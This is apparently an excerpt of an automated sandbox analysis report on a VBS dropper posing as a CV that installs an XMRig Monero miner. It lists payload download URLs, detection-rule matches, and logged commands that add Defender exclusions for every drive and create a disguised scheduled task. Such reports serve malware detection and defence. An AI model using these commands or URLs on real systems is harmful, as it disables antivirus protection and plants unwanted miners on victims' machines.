        Source: wscript.exe, 00000005.00000003.811414806.0000022163163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/cv4345521/cv/-/raw/main/gmail.7z?inline=falsem
        Source: wscript.exe, 00000005.00000003.811414806.0000022163163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/cv4345521/cv/-/raw/main/gmail.7z?inline=falsex
        Source: wscript.exe, 00000019.00000002.899281249.000001FFE25D7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000019.00000002.899123544.000001FFE0938000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000019.00000002.899241012.000001FFE0BB5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000019.00000003.898695255.000001FFE094D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000019.00000003.898409186.000001FFE093A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000019.00000003.898525051.000001FFE093A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000019.00000002.899199737.000001FFE094E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000019.00000003.898567720.000001FFE0943000.00000004.00000020.00020000.00000000.sdmp, sarmat.vbs.11.drString found in binary or memory: https://gitlab.com/cv6535510/cv/-/raw/main/curriculum_vitae-usb.vbs?inline=false
        Source: wscript.exe, 00000015.00000002.992417001.0000016591D38000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000019.00000003.898409186.000001FFE093A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000019.00000003.898525051.000001FFE093A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000019.00000003.898567720.000001FFE0943000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/cv6535510/cv/-/raw/main/curriculum_vitae-usb.vbs?inline=falseMsg
        Source: wscript.exe, 00000017.00000002.881382988.000001E320C05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000019.00000002.899241012.000001FFE0BB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/cv6535510/cv/-/raw/main/curriculum_vitae-usb.vbs?inline=falsee
        Source: wscript.exe, 00000005.00000003.811414806.0000022163163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/cwIf
        Source: wscript.exe, 00000005.00000003.858655277.000002216310C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.811414806.000002216310C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860768150.000002216310C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.855760178.000002216310C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
        Source: wscript.exe, 00000005.00000003.811836031.0000022165974000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.855760178.0000022163163000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.811414806.00000221630D2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.858632166.000002216318E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://new-sentry.gitlab.net
        Source: wscript.exe, 00000005.00000003.811836031.0000022165974000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.855760178.0000022163163000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.811414806.00000221630D2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.858632166.000002216318E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sentry.gitlab.net
        Source: wscript.exe, 00000005.00000003.811414806.0000022163163000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.857991730.0000022163565000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.855760178.0000022163163000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.811414806.00000221630D2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.858632166.000002216318E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sentry.gitlab.net/api/105/security/?sentry_key=a42ea3adc19140d9a6424906e12fba86;
        Source: wscript.exe, 00000005.00000003.811836031.0000022165974000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://snowplow.tgitlab.c%
        Source: wscript.exe, 00000005.00000003.811836031.0000022165974000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://snowplow.tgitlab.c%%.
        Source: wscript.exe, 00000005.00000003.811414806.0000022163163000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.857991730.0000022163565000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.855760178.0000022163163000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.811414806.00000221630D2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.858632166.000002216318E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://snowplow.trx.gitlab.net
        Source: wscript.exe, 00000005.00000003.811414806.0000022163163000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.857991730.0000022163565000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.855760178.0000022163163000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.811414806.00000221630D2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.858632166.000002216318E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sourcegraph.com
        Source: wscript.exe, 00000005.00000003.858655277.000002216310C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.811414806.000002216310C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860768150.000002216310C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.855760178.000002216310C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.7-zip.org/O
        Source: wscript.exe, 00000005.00000003.475087374.0000022162DC5000.00000004.00000020.00020000.00000000.sdmp, curriculum_vitae-copie.vbsString found in binary or memory: https://www.7-zip.org/a/7zr.exe
        Source: wscript.exe, 00000005.00000003.858386999.0000022162F60000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860549226.0000022162F61000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.856009779.0000022162F60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.7-zip.org/a/7zr.exel
        Source: wscript.exe, 00000005.00000003.858655277.000002216310C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.811414806.000002216310C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860768150.000002216310C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.855760178.000002216310C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.7-zip.org/w
        Source: wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
        Source: wscript.exe, 00000005.00000003.811836031.0000022165974000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.855760178.0000022163163000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.811414806.00000221630D2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.858632166.000002216318E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html
        Source: wscript.exe, 00000005.00000003.811414806.0000022163163000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.857991730.0000022163565000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.855760178.0000022163163000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.811414806.00000221630D2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.858632166.000002216318E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
        Source: wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.recaptcha.net/
        Source: 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, mservice.exe, 00000013.00000000.863918261.00007FF7A0D92000.00000002.00000001.01000000.00000009.sdmp, mservice.exe.11.drString found in binary or memory: https://xmrig.com/docs/algorithms
        Source: 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, mservice.exe, 00000013.00000000.863918261.00007FF7A0D92000.00000002.00000001.01000000.00000009.sdmp, mservice.exe.11.drString found in binary or memory: https://xmrig.com/wizard
        Source: 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, mservice.exe, 00000013.00000000.863918261.00007FF7A0D92000.00000002.00000001.01000000.00000009.sdmp, mservice.exe.11.drString found in binary or memory: https://xmrig.com/wizard%s
        Source: unknownDNS traffic detected: queries for: www.7-zip.org
        Source: global trafficHTTP traffic detected: GET /a/7zr.exe HTTP/1.1Accept: */*Accept-Language: en-usUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.7-zip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /cv4345521/cv/-/raw/main/gmail.7z?inline=false HTTP/1.1Accept: */*Accept-Language: en-usUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gitlab.comConnection: Keep-Alive
        Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
        Source: unknownTCP traffic detected without corresponding DNS query: 141.94.96.144
        Source: unknownTCP traffic detected without corresponding DNS query: 141.94.96.144
        Source: unknownTCP traffic detected without corresponding DNS query: 141.94.96.144
        Source: unknownTCP traffic detected without corresponding DNS query: 141.94.96.144
        Source: unknownTCP traffic detected without corresponding DNS query: 141.94.96.144
        Source: unknownTCP traffic detected without corresponding DNS query: 141.94.96.144
        Source: unknownTCP traffic detected without corresponding DNS query: 141.94.96.144
        Source: unknownTCP traffic detected without corresponding DNS query: 141.94.96.144
        Source: unknownTCP traffic detected without corresponding DNS query: 141.94.96.144
        Source: unknownTCP traffic detected without corresponding DNS query: 141.94.96.144
        Source: unknownTCP traffic detected without corresponding DNS query: 141.94.96.144
        Source: unknownTCP traffic detected without corresponding DNS query: 141.94.96.144
        Source: unknownTCP traffic detected without corresponding DNS query: 141.94.96.144
        Source: unknownTCP traffic detected without corresponding DNS query: 141.94.96.144
        Source: unknownTCP traffic detected without corresponding DNS query: 141.94.96.144
        Source: unknownTCP traffic detected without corresponding DNS query: 141.94.96.144
        Source: 7g.exe, 0000000B.00000003.816824886.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, ps.exe.11.drString found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.dathttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
        Source: 7g.exe, 0000000B.00000003.816824886.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, ps.exe.11.drString found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.dathttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
        Source: unknownHTTPS traffic detected: 49.12.202.237:443 -> 192.168.2.6:49712 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.65.251.78:443 -> 192.168.2.6:49713 version: TLS 1.2

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: 11.3.7g.exe.35b7600.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero mining software Author: Florian Roth (Nextron Systems)
        Source: 11.3.7g.exe.35b7600.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth (Nextron Systems)
        Source: 11.3.7g.exe.35b7600.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
        Source: 11.3.7g.exe.3580000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero mining software Author: Florian Roth (Nextron Systems)
        Source: 11.3.7g.exe.3580000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth (Nextron Systems)
        Source: 11.3.7g.exe.3580000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
        Source: 19.0.mservice.exe.7ff7a0a50000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero mining software Author: Florian Roth (Nextron Systems)
        Source: 19.0.mservice.exe.7ff7a0a50000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth (Nextron Systems)
        Source: 19.0.mservice.exe.7ff7a0a50000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
        Source: 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Monero mining software Author: Florian Roth (Nextron Systems)
        Source: 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth (Nextron Systems)
        Source: 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects coinmining malware Author: ditekSHen
        Source: C:\Users\Public\WindowsUpdate\mservice.exe, type: DROPPEDMatched rule: Detects Monero mining software Author: Florian Roth (Nextron Systems)
        Source: C:\Users\Public\WindowsUpdate\mservice.exe, type: DROPPEDMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth (Nextron Systems)
        Source: C:\Users\Public\WindowsUpdate\mservice.exe, type: DROPPEDMatched rule: Detects coinmining malware Author: ditekSHen
        Wscript called in batch mode (surpress errors)
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\Public\WindowsUpdate\mozilla.vbs" //b //nologo
        Source: unknownProcess created: C:\Windows\System32\wscript.exe wscript.exe C:\Users\Public\windowsupdate\mservice.vbs //b //nologo
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo
        Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Users\Public\WindowsUpdate\mservice.vbs" //b //nologo
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo
        Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Users\Public\WindowsUpdate\mservice.vbs" //b //nologo
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\Public\WindowsUpdate\mozilla.vbs" //b //nologoJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologoJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologoJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo
        Wscript starts Powershell (via cmd or directly)
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /c powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /c schtasks.exe /create /f /tn MicrosoftUpdateService /XML "%public%\WindowsUpdate\Update.xml
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /c powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /c schtasks.exe /create /f /tn MicrosoftUpdateService /XML "%public%\WindowsUpdate\Update.xmlJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:"Jump to behavior
        Potential malicious VBS script found (suspicious strings)
        Source: Initial file: L5n6SjMwbK03L5.ShellExecute L5H79SnDOdcL5,L5x1dZCrNL5,"","runas",0
        Source: Initial file: L5n6SjMwbK03L5.ShellExecute "wscript.exe", Chr(34) & WScript.ScriptFullName & Chr(34), "", "runas", 1
        Source: C:\Users\Public\7g.exeCode function: 11_2_003F3F0211_2_003F3F02
        Source: C:\Users\Public\7g.exeCode function: 11_2_0041825011_2_00418250
        Source: C:\Users\Public\7g.exeCode function: 11_2_0041423811_2_00414238
        Source: C:\Users\Public\7g.exeCode function: 11_2_003C837411_2_003C8374
        Source: C:\Users\Public\7g.exeCode function: 11_2_0040C3C011_2_0040C3C0
        Source: C:\Users\Public\7g.exeCode function: 11_2_0041C3D011_2_0041C3D0
        Source: C:\Users\Public\7g.exeCode function: 11_2_0040C52011_2_0040C520
        Source: C:\Users\Public\7g.exeCode function: 11_2_004225BA11_2_004225BA
        Source: C:\Users\Public\7g.exeCode function: 11_2_003DE64C11_2_003DE64C
        Source: C:\Users\Public\7g.exeCode function: 11_2_004226A111_2_004226A1
        Source: C:\Users\Public\7g.exeCode function: 11_2_003CA6D711_2_003CA6D7
        Source: C:\Users\Public\7g.exeCode function: 11_2_003FC7CC11_2_003FC7CC
        Source: C:\Users\Public\7g.exeCode function: 11_2_003CA8A611_2_003CA8A6
        Source: C:\Users\Public\7g.exeCode function: 11_2_0041E9D011_2_0041E9D0
        Source: C:\Users\Public\7g.exeCode function: 11_2_0040AA3011_2_0040AA30
        Source: C:\Users\Public\7g.exeCode function: 11_2_00406A9011_2_00406A90
        Source: C:\Users\Public\7g.exeCode function: 11_2_00414B7011_2_00414B70
        Source: C:\Users\Public\7g.exeCode function: 11_2_0041EBA911_2_0041EBA9
        Source: C:\Users\Public\7g.exeCode function: 11_2_003CCC1E11_2_003CCC1E
        Source: C:\Users\Public\7g.exeCode function: 11_2_00410DF911_2_00410DF9
        Source: C:\Users\Public\7g.exeCode function: 11_2_00414E9011_2_00414E90
        Source: C:\Users\Public\7g.exeCode function: 11_2_0041311011_2_00413110
        Source: C:\Users\Public\7g.exeCode function: 11_2_004191D011_2_004191D0
        Source: C:\Users\Public\7g.exeCode function: 11_2_0041319011_2_00413190
        Source: C:\Users\Public\7g.exeCode function: 11_2_004152C011_2_004152C0
        Source: C:\Users\Public\7g.exeCode function: 11_2_0041D2D011_2_0041D2D0
        Source: C:\Users\Public\7g.exeCode function: 11_2_0041729011_2_00417290
        Source: C:\Users\Public\7g.exeCode function: 11_2_003B537F11_2_003B537F
        Source: C:\Users\Public\7g.exeCode function: 11_2_003F934811_2_003F9348
        Source: C:\Users\Public\7g.exeCode function: 11_2_004213A011_2_004213A0
        Source: C:\Users\Public\7g.exeCode function: 11_2_003B943611_2_003B9436
        Source: C:\Users\Public\7g.exeCode function: 11_2_0041141011_2_00411410
        Source: C:\Users\Public\7g.exeCode function: 11_2_0041D48011_2_0041D480
        Source: C:\Users\Public\7g.exeCode function: 11_2_003B157211_2_003B1572
        Source: C:\Users\Public\7g.exeCode function: 11_2_0040B5B011_2_0040B5B0
        Source: curriculum_vitae-copie.vbsInitial sample: Strings found which are bigger than 50
        Source: C:\Users\Public\7g.exeFile created: C:\Users\Public\WindowsUpdate\WinRing0x64.sysJump to behavior
        Source: Joe Sandbox ViewDropped File: C:\Users\Public\WindowsUpdate\WinRing0x64.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
        Source: 11.3.7g.exe.3a0ca00.3.raw.unpack, type: UNPACKEDPEMatched rule: PUA_VULN_Driver_OpenLibSysorg_WinRingsys_WinRing_7Q9n date = 2023-05-19, author = Florian Roth, description = Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - 0c0195c48b6b8582fa6f6373032118da.bin, 27bcbeec8a466178a6057b64bef66512.bin, score = , reference = https://github.com/magicsword-io/LOLDrivers, hash = a7b000abbcc344444a9b00cfade7aa22ab92ce0cadec196c30eb1851ae4fa062
        Source: 11.3.7g.exe.35b7600.1.raw.unpack, type: UNPACKEDPEMatched rule: XMRIG_Monero_Miner date = 2018-01-04, hash4 = 0972ea3a41655968f063c91a6dbd31788b20e64ff272b27961d12c681e40b2d2, hash3 = f3f2703a7959183b010d808521b531559650f6f347a5830e47f8e3831b10bad5, hash2 = 08b55f9b7dafc53dfc43f7f70cdd7048d231767745b76dc4474370fb323d7ae7, hash1 = 5c13a274adb9590249546495446bb6be5f2a08f9dcd2fc8a2049d9dc471135c0, author = Florian Roth (Nextron Systems), description = Detects Monero mining software, reference = https://github.com/xmrig/xmrig/releases, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-11-10
        Source: 11.3.7g.exe.35b7600.1.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth (Nextron Systems), description = Detects command line parameters often used by crypto mining software, score = , reference = https://www.poolwatch.io/coin/monero
        Source: 11.3.7g.exe.35b7600.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth (Nextron Systems), description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
        Source: 11.3.7g.exe.35b7600.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
        Source: 11.3.7g.exe.3580000.2.raw.unpack, type: UNPACKEDPEMatched rule: XMRIG_Monero_Miner date = 2018-01-04, hash4 = 0972ea3a41655968f063c91a6dbd31788b20e64ff272b27961d12c681e40b2d2, hash3 = f3f2703a7959183b010d808521b531559650f6f347a5830e47f8e3831b10bad5, hash2 = 08b55f9b7dafc53dfc43f7f70cdd7048d231767745b76dc4474370fb323d7ae7, hash1 = 5c13a274adb9590249546495446bb6be5f2a08f9dcd2fc8a2049d9dc471135c0, author = Florian Roth (Nextron Systems), description = Detects Monero mining software, reference = https://github.com/xmrig/xmrig/releases, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-11-10
        Source: 11.3.7g.exe.3580000.2.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth (Nextron Systems), description = Detects command line parameters often used by crypto mining software, score = , reference = https://www.poolwatch.io/coin/monero
        Source: 11.3.7g.exe.3580000.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth (Nextron Systems), description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
        Source: 11.3.7g.exe.3580000.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
        Source: 19.0.mservice.exe.7ff7a0a50000.0.unpack, type: UNPACKEDPEMatched rule: XMRIG_Monero_Miner date = 2018-01-04, hash4 = 0972ea3a41655968f063c91a6dbd31788b20e64ff272b27961d12c681e40b2d2, hash3 = f3f2703a7959183b010d808521b531559650f6f347a5830e47f8e3831b10bad5, hash2 = 08b55f9b7dafc53dfc43f7f70cdd7048d231767745b76dc4474370fb323d7ae7, hash1 = 5c13a274adb9590249546495446bb6be5f2a08f9dcd2fc8a2049d9dc471135c0, author = Florian Roth (Nextron Systems), description = Detects Monero mining software, reference = https://github.com/xmrig/xmrig/releases, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-11-10
        Source: 19.0.mservice.exe.7ff7a0a50000.0.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth (Nextron Systems), description = Detects command line parameters often used by crypto mining software, score = , reference = https://www.poolwatch.io/coin/monero
        Source: 19.0.mservice.exe.7ff7a0a50000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth (Nextron Systems), description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
        Source: 19.0.mservice.exe.7ff7a0a50000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
        Source: 00000011.00000002.868028749.0000022E67CE5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth (Nextron Systems), description = Detects command line parameters often used by crypto mining software, score = , reference = https://www.poolwatch.io/coin/monero
        Source: 00000013.00000002.992637368.000001854050B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth (Nextron Systems), description = Detects command line parameters often used by crypto mining software, score = , reference = https://www.poolwatch.io/coin/monero
        Source: 0000000B.00000003.815621184.0000000001480000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth (Nextron Systems), description = Detects command line parameters often used by crypto mining software, score = , reference = https://www.poolwatch.io/coin/monero
        Source: 00000019.00000003.898659213.000001FFE094A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: webshell_asp_sql date = 2021/03/14, author = Arnim Rupp, description = ASP webshell giving SQL access. Might also be a dual use tool., license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 00000018.00000002.898732843.000001DBC7705000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth (Nextron Systems), description = Detects command line parameters often used by crypto mining software, score = , reference = https://www.poolwatch.io/coin/monero
